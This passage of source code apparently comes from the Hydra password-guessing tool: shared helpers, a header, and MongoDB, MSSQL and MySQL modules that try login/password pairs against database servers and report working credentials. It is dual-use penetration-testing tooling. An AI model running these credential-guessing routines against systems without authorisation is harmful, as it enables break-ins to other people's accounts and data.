1) >> 4));\n big[2] = hydra_conv64(((*(ptr + 1) & 15) << 2) + (*(ptr + 2) >> 6));\n big[3] = hydra_conv64(*(ptr + 2) & 63);\n len += strlen((char *)big);\n if (len > bufsize) {\n buf[0] = 0;\n return;\n }\n strcat((char *)bof, (char *)big);\n ptr += 3;\n }\n\n if (*ptr != 0) {\n small[0] = *ptr;\n if (*(ptr + 1) != 0)\n small[1] = *(ptr + 1);\n else\n small[1] = 0;\n ptr = small;\n big[0] = hydra_conv64(*ptr >> 2);\n big[1] = hydra_conv64(((*ptr & 3) << 4) + (*(ptr + 1) >> 4));\n big[2] = hydra_conv64(((*(ptr + 1) & 15) << 2) + (*(ptr + 2) >> 6));\n big[3] = hydra_conv64(*(ptr + 2) & 63);\n if (small[1] == 0)\n big[2] = '=';\n big[3] = '=';\n strcat((char *)bof, (char *)big);\n }\n\n strcpy((char *)buf, (char *)bof); /* can not overflow */\n}\n\nvoid hydra_dump_asciihex(unsigned char *string, int32_t length) {\n unsigned char *p = (unsigned char *)string;\n unsigned char lastrow_data[16];\n int32_t rows = length / HYDRA_DUMP_ROWS;\n int32_t lastrow = length % HYDRA_DUMP_ROWS;\n int32_t i, j;\n\n for (i = 0; i < rows; i++) {\n printf(\"%04hx: \", i * 16);\n for (j = 0; j < HYDRA_DUMP_ROWS; j++) {\n printf(\"%02x\", p[(i * 16) + j]);\n if (j % 2 == 1)\n printf(\" \");\n }\n printf(\" [ \");\n for (j = 0; j < HYDRA_DUMP_ROWS; j++) {\n if (isprint(p[(i * 16) + j]))\n printf(\"%c\", p[(i * 16) + j]);\n else\n printf(\".\");\n }\n printf(\" ]\\n\");\n }\n if (lastrow > 0) {\n memset(lastrow_data, 0, sizeof(lastrow_data));\n memcpy(lastrow_data, p + length - lastrow, lastrow);\n printf(\"%04hx: \", i * 16);\n for (j = 0; j < lastrow; j++) {\n printf(\"%02x\", p[(i * 16) + j]);\n if (j % 2 == 1)\n printf(\" \");\n }\n while (j < HYDRA_DUMP_ROWS) {\n printf(\" \");\n if (j % 2 == 1)\n printf(\" \");\n j++;\n }\n printf(\" [ \");\n for (j = 0; j < lastrow; j++) {\n if (isprint(p[(i * 16) + j]))\n printf(\"%c\", p[(i * 16) + j]);\n else\n printf(\".\");\n }\n while (j < HYDRA_DUMP_ROWS) {\n printf(\" \");\n j++;\n }\n printf(\" ]\\n\");\n }\n}\n\nchar *hydra_address2string(char *address) {\n struct sockaddr_in target;\n struct sockaddr_in6 target6;\n\n if (address[0] == 4) {\n memcpy(&target.sin_addr.s_addr, &address[1], 4);\n return inet_ntoa((struct in_addr)target.sin_addr);\n } else\n#ifdef AF_INET6\n if (address[0] == 16) {\n memcpy(&target6.sin6_addr, &address[1], 16);\n inet_ntop(AF_INET6, &target6.sin6_addr, ipstring, sizeof(ipstring));\n return ipstring;\n } else\n#endif\n {\n if (debug)\n fprintf(stderr, \"[ERROR] unknown address string size!\\n\");\n return NULL;\n }\n return NULL; // not reached\n}\n\nchar *hydra_address2string_beautiful(char *address) {\n struct sockaddr_in target;\n struct sockaddr_in6 target6;\n\n if (address[0] == 4) {\n memcpy(&target.sin_addr.s_addr, &address[1], 4);\n return inet_ntoa((struct in_addr)target.sin_addr);\n } else\n#ifdef AF_INET6\n if (address[0] == 16) {\n memcpy(&target6.sin6_addr, &address[1], 16);\n ipstring[0] = '[';\n inet_ntop(AF_INET6, &target6.sin6_addr, ipstring + 1, sizeof(ipstring) - 1);\n if (address[17] != 0) {\n strcat(ipstring, \"%\");\n strcat(ipstring, address + 17);\n }\n strcat(ipstring, \"]\");\n return ipstring;\n } else\n#endif\n {\n if (debug)\n fprintf(stderr, \"[ERROR] unknown address string size!\\n\");\n return NULL;\n }\n return NULL; // not reached\n}\n\nvoid hydra_set_srcport(int32_t port) { src_port = port; }\n\n#ifdef HAVE_PCRE\nint32_t hydra_string_match(char *str, const char *regex) {\n pcre2_code *re = NULL;\n int32_t error_code = 0;\n PCRE2_SIZE error_offset;\n int32_t rc = 0;\n\n re = pcre2_compile(regex, PCRE2_ZERO_TERMINATED, PCRE2_CASELESS | PCRE2_DOTALL, &error_code, &error_offset, NULL);\n if (re == NULL) {\n fprintf(stderr, \"[ERROR] PCRE compilation failed at offset %d: %d\\n\", (int)error_offset, (int)error_code);\n return 0;\n }\n\n pcre2_match_data *match_data = pcre2_match_data_create_from_pattern(re, NULL);\n rc = pcre2_match(re, str, PCRE2_ZERO_TERMINATED, 0, 0, match_data, NULL);\n pcre2_match_data_free(match_data);\n pcre2_code_free(re);\n\n if (rc >= 1) {\n return 1;\n }\n return 0;\n}\n#endif\n\n/*\n * str_replace.c implements a str_replace PHP like function\n * Copyright (C) 2009 chantra \n *\n * Create a new string with [substr] being replaced ONCE by [replacement] in\n * [string] Returns the new string, or NULL if out of memory. The caller is\n * responsible for freeing this new string.\n *\n */\nchar *hydra_string_replace(const char *string, const char *substr, const char *replacement) {\n char *tok = NULL;\n char *newstr = NULL;\n\n if (string == NULL)\n return NULL;\n if (substr == NULL || replacement == NULL)\n return strdup(string);\n tok = strstr(string, substr);\n if (tok == NULL)\n return strdup(string);\n newstr = malloc(strlen(string) - strlen(substr) + strlen(replacement) + 2);\n if (newstr == NULL)\n return NULL;\n memset(newstr, 0, strlen(string) - strlen(substr) + strlen(replacement) + 2);\n memcpy(newstr, string, tok - string);\n memcpy(newstr + (tok - string), replacement, strlen(replacement));\n memcpy(newstr + (tok - string) + strlen(replacement), tok + strlen(substr), strlen(string) - strlen(substr) - (tok - string));\n return newstr;\n}\n\nchar *hydra_strcasestr(const char *haystack, const char *needle) {\n if (needle == NULL || *needle == 0)\n return NULL;\n\n for (; *haystack; ++haystack) {\n if (toupper((int32_t)*haystack) == toupper((int32_t)*needle)) {\n const char *h, *n;\n\n for (h = haystack, n = needle; *h && *n; ++h, ++n) {\n if (toupper((int32_t)*h) != toupper((int32_t)*n)) {\n break;\n }\n }\n if (!*n) { /* matched all of 'needle' to null termination */\n return (char *)haystack; /* return the start of the match */\n }\n }\n }\n return NULL;\n}\n\nvoid hydra_dump_data(unsigned char *buf, int32_t len, char *text) {\n unsigned char *p = (unsigned char *)buf;\n unsigned char lastrow_data[16];\n int32_t rows = len / 16;\n int32_t lastrow = len % 16;\n int32_t i, j;\n\n if (text != NULL && text[0] != 0)\n printf(\"%s (%d bytes):\\n\", text, len);\n\n if (buf == NULL || len < 1)\n return;\n\n for (i = 0; i < rows; i++) {\n printf(\"%04hx: \", i * 16);\n for (j = 0; j < 16; j++) {\n printf(\"%02x\", p[(i * 16) + j]);\n if (j % 2 == 1)\n printf(\" \");\n }\n printf(\" [ \");\n for (j = 0; j < 16; j++) {\n if (isprint(p[(i * 16) + j]))\n printf(\"%c\", p[(i * 16) + j]);\n else\n printf(\".\");\n }\n printf(\" ]\\n\");\n }\n if (lastrow > 0) {\n memset(lastrow_data, 0, sizeof(lastrow_data));\n memcpy(lastrow_data, p + len - lastrow, lastrow);\n printf(\"%04hx: \", i * 16);\n for (j = 0; j < lastrow; j++) {\n printf(\"%02x\", p[(i * 16) + j]);\n if (j % 2 == 1)\n printf(\" \");\n }\n while (j < 16) {\n printf(\" \");\n if (j % 2 == 1)\n printf(\" \");\n j++;\n }\n printf(\" [ \");\n for (j = 0; j < lastrow; j++) {\n if (isprint(p[(i * 16) + j]))\n printf(\"%c\", p[(i * 16) + j]);\n else\n printf(\".\");\n }\n while (j < 16) {\n printf(\" \");\n j++;\n }\n printf(\" ]\\n\");\n }\n}\n\nint32_t hydra_memsearch(char *haystack, int32_t hlen, char *needle, int32_t nlen) {\n int32_t i;\n\n for (i = 0; i <= hlen - nlen; i++)\n if (memcmp(haystack + i, needle, nlen) == 0)\n return i;\n return -1;\n}\n" }, { "path": "hydra-mod.h", "content": "#ifndef _HYDRA_MOD_H\n#define _HYDRA_MOD_H\n\n#include \"hydra.h\"\n\n#ifdef __sun\n#include \n#elif defined(__FreeBSD__) || defined(__IBMCPP__) || defined(_AIX)\n#include \n#else\n#include \n#endif\n\nextern char quiet;\n\nextern void hydra_child_exit(int32_t code);\nextern void hydra_register_socket(int32_t s);\nextern char *hydra_get_next_pair();\nextern char *hydra_get_next_login();\nextern char *hydra_get_next_password();\nextern void hydra_completed_pair();\nextern void hydra_completed_pair_found();\nextern void hydra_completed_pair_skip();\nextern void hydra_report_found(int32_t port, char *svc, FILE *fp);\nextern void hydra_report_pass_found(int32_t port, char *ip, char *svc, FILE *fp);\nextern void hydra_report_found_host(int32_t port, char *ip, char *svc, FILE *fp);\nextern void hydra_report_found_host_msg(int32_t port, char *ip, char *svc, FILE *fp, char *msg);\nextern void hydra_report_debug(FILE *st, char *format, ...);\nextern int32_t hydra_connect_to_ssl(int32_t socket, char *hostname);\nextern int32_t hydra_connect_ssl(char *host, int32_t port, char *hostname);\nextern int32_t hydra_connect_tcp(char *host, int32_t port);\nextern int32_t hydra_connect_udp(char *host, int32_t port);\nextern int32_t hydra_disconnect(int32_t socket);\nextern int32_t hydra_data_ready(int32_t socket);\nextern int32_t hydra_recv(int32_t socket, char *buf, uint32_t length);\nextern int32_t hydra_recv_nb(int32_t socket, char *buf, uint32_t length);\nextern char *hydra_receive_line(int32_t socket);\nextern int32_t hydra_send(int32_t socket, char *buf, uint32_t size, int32_t options);\nextern int32_t make_to_lower(char *buf);\nextern unsigned char hydra_conv64(unsigned char in);\nextern void hydra_tobase64(unsigned char *buf, uint32_t buflen, uint32_t bufsize);\nextern void hydra_dump_asciihex(unsigned char *string, int32_t length);\nextern void hydra_set_srcport(int32_t port);\nextern char *hydra_address2string(char *address);\nextern char *hydra_address2string_beautiful(char *address);\nextern char *hydra_strcasestr(const char *haystack, const char *needle);\nextern void hydra_dump_data(unsigned char *buf, int32_t len, char *text);\nextern int32_t hydra_memsearch(char *haystack, int32_t hlen, char *needle, int32_t nlen);\nextern char *hydra_strrep(char *string, char *oldpiece, char *newpiece);\n\n#ifdef HAVE_PCRE\nint32_t hydra_string_match(char *str, const char *regex);\n#endif\nchar *hydra_string_replace(const char *string, const char *substr, const char *replacement);\n\nint32_t debug;\nint32_t verbose;\nint32_t waittime;\nint32_t port;\nint32_t found;\nint32_t proxy_count;\nint32_t use_proxy;\nint32_t selected_proxy;\nchar proxy_string_ip[MAX_PROXY_COUNT][36];\nint32_t proxy_string_port[MAX_PROXY_COUNT];\nchar proxy_string_type[MAX_PROXY_COUNT][10];\nchar *proxy_authentication[MAX_PROXY_COUNT];\nchar *cmdlinetarget;\n\n#ifndef __APPLE__\ntypedef int32_t BOOL;\n#else /* __APPLE__ */\n/* ensure compatibility with objc libraries */\n#if (TARGET_OS_IPHONE && __LP64__) || TARGET_OS_WATCH\ntypedef bool BOOL;\n#else\ntypedef signed char BOOL;\n#endif\n#endif /* __APPLE__ */\n\n#define hydra_report fprintf\n\n#endif\n" }, { "path": "hydra-mongodb.c", "content": "// This plugin was written by \n// Tested on mongodb-server 1:3.6.3-0ubuntu1\n// MONGODB-CR is been deprecated\n\n#ifdef LIBMONGODB2\n#include \n#endif\n#ifdef LIBMONGODB\n#include \n#endif\n\n#include \"hydra-mod.h\"\n\n#if !defined(LIBMONGODB2) && !defined(LIBMONGODB)\nvoid dummy_mongodb() { printf(\"\\n\"); }\n#else\n\nextern int32_t hydra_data_ready_timed(int32_t socket, long sec, long usec);\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\nchar *buf;\n\n#define DEFAULT_DB \"admin\"\n\nint is_error_msg(char *msg) {\n if (strstr(msg, \"errmsg \")) {\n if (debug)\n hydra_report(stderr, \"[ERROR] %s\\n\", msg);\n return 1;\n }\n return 0;\n}\n\nint require_auth(int32_t sock) {\n unsigned char m_hdr[] = \"\\x3f\\x00\\x00\\x00\" // messageLength (63)\n \"\\x00\\x00\\x00\\x41\" // requestID\n \"\\xff\\xff\\xff\\xff\" // responseTo\n \"\\xd4\\x07\\x00\\x00\" // opCode (2004 OP_QUERY)\n \"\\x00\\x00\\x00\\x00\" // flags\n \"\\x61\\x64\\x6d\\x69\\x6e\\x2e\\x24\\x63\\x6d\\x64\\x00\" // fullCollectionName\n // (admin.$cmd)\n \"\\x00\\x00\\x00\\x00\" // numberToSkip (0)\n \"\\x01\\x00\\x00\\x00\" // numberToReturn (1)\n \"\\x18\\x00\\x00\\x00\\x10\\x6c\\x69\\x73\\x74\\x44\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x73\"\n \"\\x00\\x01\\x00\\x00\\x00\\x00\"; // query ({\"listDatabases\"=>1})\n\n if (hydra_send(sock, m_hdr, sizeof(m_hdr), 0) > 0) {\n if (hydra_data_ready_timed(sock, 0, 1000) > 0) {\n buf = hydra_receive_line(sock);\n return is_error_msg(buf);\n }\n }\n return 2;\n}\n\nint32_t start_mongodb(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n char uri[256];\n mongoc_client_t *client;\n mongoc_database_t *database;\n mongoc_collection_t *collection;\n mongoc_cursor_t *cursor;\n bson_t q;\n const bson_t *doc;\n bson_error_t error;\n bool r;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n mongoc_init();\n mongoc_log_set_handler(NULL, NULL);\n bson_init(&q);\n\n if (login[0] == '\\0' && pass[0] == '\\0') {\n snprintf(uri, sizeof(uri), \"mongodb://%s:%d/?authSource=%s\", hydra_address2string(ip), port, miscptr);\n } else {\n snprintf(uri, sizeof(uri), \"mongodb://%s:%s@%s:%d/?authSource=%s\", login, pass, hydra_address2string(ip), port, miscptr);\n }\n\n client = mongoc_client_new(uri);\n if (!client) {\n hydra_completed_pair_skip();\n return 3;\n }\n\n mongoc_client_set_appname(client, \"hydra\");\n collection = mongoc_client_get_collection(client, miscptr, \"test\");\n cursor = mongoc_collection_find_with_opts(collection, &q, NULL, NULL);\n r = mongoc_cursor_next(cursor, &doc);\n if (!r) {\n r = mongoc_cursor_error(cursor, &error);\n if (r) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Can not read document: %s\\n\", error.message);\n mongoc_cursor_destroy(cursor);\n mongoc_collection_destroy(collection);\n mongoc_client_destroy(client);\n mongoc_cleanup();\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n return 3;\n }\n return 1;\n }\n }\n\n mongoc_cursor_destroy(cursor);\n mongoc_collection_destroy(collection);\n mongoc_client_destroy(client);\n mongoc_cleanup();\n\n hydra_report_found_host(port, ip, \"mongodb\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_mongodb(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n\n if (!miscptr) {\n if (verbose)\n hydra_report(stderr, \"[INFO] Using default database \\\"admin\\\"\\n\");\n miscptr = DEFAULT_DB;\n }\n\n hydra_register_socket(sp);\n\n while (1) {\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n switch (run) {\n case 1:\n next_run = start_mongodb(sock, ip, port, options, miscptr, fp);\n if (next_run == 1 && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 2:\n hydra_child_exit(0);\n return;\n default:\n if (!verbose)\n hydra_report(stderr, \"[ERROR] Caught unknown return code, try verbose \"\n \"option for more details\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_mongodb_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n\n int32_t myport = PORT_MONGODB;\n int32_t sock = -1;\n\n if (port != 0)\n myport = port;\n\n if ((options & OPTION_SSL) == 0)\n sock = hydra_connect_tcp(ip, myport);\n else\n sock = hydra_connect_ssl(ip, myport, hostname);\n\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Can not connect\\n\");\n return -1;\n }\n\n if (!require_auth(sock)) {\n hydra_report_found_host(port, ip, \"mongodb\", fp);\n hydra_report(stderr, \"[ERROR] Mongodb server does not require any authentication\\n\");\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n return -1;\n }\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n return 0;\n}\n\n#endif\n\nvoid usage_mongodb(const char *service) {\n printf(\"Module mongodb is optionally taking a database name to attack, \"\n \"default is \\\"admin\\\"\\n\\n\");\n}\n" }, { "path": "hydra-mssql.c", "content": "#include \"hydra-mod.h\"\nextern char *HYDRA_EXIT;\nchar *buf;\n\n#if defined(HAVE_SYBFRONT) && defined(HAVE_SYBDB)\n#include \n#include \n#endif\n\n#define MSLEN 30\n\nunsigned char p_hdr[] = \"\\x02\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\nunsigned char p_pk2[] = \"\\x30\\x30\\x30\\x30\\x30\\x30\\x61\\x30\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x20\\x18\\x81\\xb8\\x2c\\x08\\x03\"\n \"\\x01\\x06\\x0a\\x09\\x01\\x01\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x73\\x71\\x75\\x65\\x6c\\x64\\x61\"\n \"\\x20\\x31\\x2e\\x30\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x0b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\";\nunsigned char p_pk3[] = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x04\\x02\\x00\\x00\\x4d\\x53\\x44\"\n \"\\x42\\x4c\\x49\\x42\\x00\\x00\\x00\\x07\\x06\\x00\\x00\"\n \"\\x00\\x00\\x0d\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\";\nunsigned char p_lng[] = \"\\x02\\x01\\x00\\x47\\x00\\x00\\x02\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x30\\x30\\x30\\x00\\x00\"\n \"\\x00\\x03\\x00\\x00\\x00\";\n\nint32_t start_mssql(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[1024];\n char *ipaddr_str = hydra_address2string(ip);\n char ms_login[MSLEN + 1];\n char ms_pass[MSLEN + 1];\n unsigned char len_login, len_pass;\n int32_t ret = -1;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n#if defined(HAVE_SYBFRONT) && defined(HAVE_SYBDB)\n if ((strlen(login) > MSLEN) || (strlen(pass) > MSLEN)) {\n DBPROCESS *dbproc;\n LOGINREC *attempt;\n\n attempt = dblogin();\n\n DBSETLUSER(attempt, login);\n DBSETLPWD(attempt, pass);\n\n // Connect without specifying a database\n dbproc = dbopen(attempt, ipaddr_str);\n\n if (dbproc != NULL) {\n dbclose(dbproc);\n dbexit();\n hydra_report_found_host(port, ip, \"mssql\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n }\n\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n\n return 1;\n }\n#else\n if ((strlen(login) > MSLEN) || (strlen(pass) > MSLEN)) {\n fprintf(stderr, \"[WARNING] To crack credentials longer than 30 characters, install freetds and recompile\\n\");\n }\n#endif\n if (strlen(login) > MSLEN)\n login[MSLEN - 1] = 0;\n if (strlen(pass) > MSLEN)\n pass[MSLEN - 1] = 0;\n len_login = strlen(login);\n len_pass = strlen(pass);\n memset(ms_login, 0, MSLEN + 1);\n memset(ms_pass, 0, MSLEN + 1);\n strcpy(ms_login, login);\n strcpy(ms_pass, pass);\n\n memset(buffer, 0, sizeof(buffer));\n memcpy(buffer, p_hdr, 39);\n memcpy(buffer + 39, ms_login, MSLEN);\n memcpy(buffer + MSLEN + 39, &len_login, 1);\n memcpy(buffer + MSLEN + 1 + 39, ms_pass, MSLEN);\n memcpy(buffer + MSLEN + 1 + 39 + MSLEN, &len_pass, 1);\n memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1, p_pk2, 110);\n memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110, &len_pass, 1);\n memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1, ms_pass, MSLEN);\n memcpy(buffer + MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1 + MSLEN, p_pk3, 270);\n\n if (hydra_send(s, buffer, MSLEN + 1 + 39 + MSLEN + 1 + 110 + 1 + MSLEN + 270, 0) < 0)\n return 1;\n if (hydra_send(s, (char *)p_lng, 71, 0) < 0)\n return 1;\n\n memset(buffer, 0, sizeof(buffer));\n ret = hydra_recv_nb(s, buffer, sizeof(buffer));\n\n if (ret <= 0)\n return 3;\n\n if (ret > 10 && buffer[8] == '\\xe3') {\n hydra_report_found_host(port, ip, \"mssql\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n return 1;\n }\n\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n\n return 1;\n}\n\nvoid service_mssql(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_MSSQL, mysslport = PORT_MSSQL_SSL;\n\n#if defined(HAVE_SYBFRONT) && defined(HAVE_SYBDB)\n dbinit();\n#endif\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = start_mssql(sock, ip, port, options, miscptr, fp);\n hydra_disconnect(sock);\n break;\n case 2: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_mssql_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-mysql.c", "content": "\n/* mysql 3.2x.x to 4.x support - by mcbethh (at) u-n-f (dot) com */\n\n/* david (dot) maciejak (at) gmail (dot) com for using libmysqlclient-dev,\n * adding support for mysql version 5.x */\n\n#include \"hydra-mod.h\"\n\n#ifndef HAVE_MATH_H\n#include \nvoid dummy_mysql() { printf(\"\\n\"); }\n\nvoid service_mysql(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { printf(\"\\n\"); }\n#else\n\n#include \n\n#define DEFAULT_DB \"mysql\"\n\n#ifndef LIBMYSQLCLIENT\n#else\n#if defined(HAVE_MYSQL_MYSQL_H)\n#include \n#elif defined(HAVE_MYSQL_H)\n#include \n#else\n#error libmysqlclient found, but no usable headers available\n#endif\nMYSQL *mysql = NULL;\n#endif\n\nvoid hydra_hash_password(unsigned long *result, const char *password);\nchar *hydra_scramble(char *to, const char *message, const char *password);\n\nextern int32_t internal__hydra_recv(int32_t socket, char *buf, int32_t length);\nextern int32_t hydra_data_ready_timed(int32_t socket, long sec, long usec);\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\nchar mysqlsalt[9];\n\n/* modified hydra_receive_line, I've striped code which changed every 0x00 to\n * 0x20 */\nchar *hydra_mysql_receive_line(int32_t socket) {\n char buf[300], *buff, *buff2;\n int32_t i = 0, j = 0, buff_size = 300;\n\n buff = malloc(buff_size);\n if (buff == NULL)\n return NULL;\n memset(buff, 0, sizeof(buf));\n\n i = hydra_data_ready_timed(socket, (long)waittime, 0);\n if (i > 0) {\n if ((i = internal__hydra_recv(socket, buff, sizeof(buf))) < 0) {\n free(buff);\n return NULL;\n }\n }\n if (i <= 0) {\n if (debug)\n hydra_report_debug(stderr, \"DEBUG_RECV_BEGIN||END\\n\");\n free(buff);\n return NULL;\n }\n\n j = 1;\n while (hydra_data_ready(socket) > 0 && j > 0) {\n j = internal__hydra_recv(socket, buf, sizeof(buf));\n if (j > 0) {\n if (i + j > buff_size || (buff2 = realloc(buff, i + j)) == NULL) {\n free(buff);\n return NULL;\n } else {\n buff = buff2;\n buff_size = i + j;\n }\n memcpy(buff + i, &buf, j);\n i += j;\n }\n }\n\n if (debug)\n hydra_report_debug(stderr, \"DEBUG_RECV_BEGIN|%s|END\\n\", buff);\n return buff;\n}\n\n/* check if valid mysql protocol, mysql version and read salt */\nchar hydra_mysql_init(int32_t sock) {\n char *server_version, *pos, *buf;\n unsigned char protocol;\n\n buf = hydra_mysql_receive_line(sock);\n if (buf == NULL)\n return 1;\n\n protocol = buf[4];\n if (protocol == 0xff) {\n pos = &buf[6];\n // *(strchr(pos, '.')) = '\\0';\n hydra_report(stderr, \"[ERROR] %s\\n\", pos);\n free(buf);\n return 2;\n }\n if (protocol <= 10) {\n free(buf);\n return 2;\n }\n if (protocol > 10) {\n fprintf(stderr,\n \"[INFO] This is protocol version %d, only v10 is supported, not \"\n \"sure if it will work\\n\",\n protocol);\n }\n server_version = &buf[5];\n pos = buf + 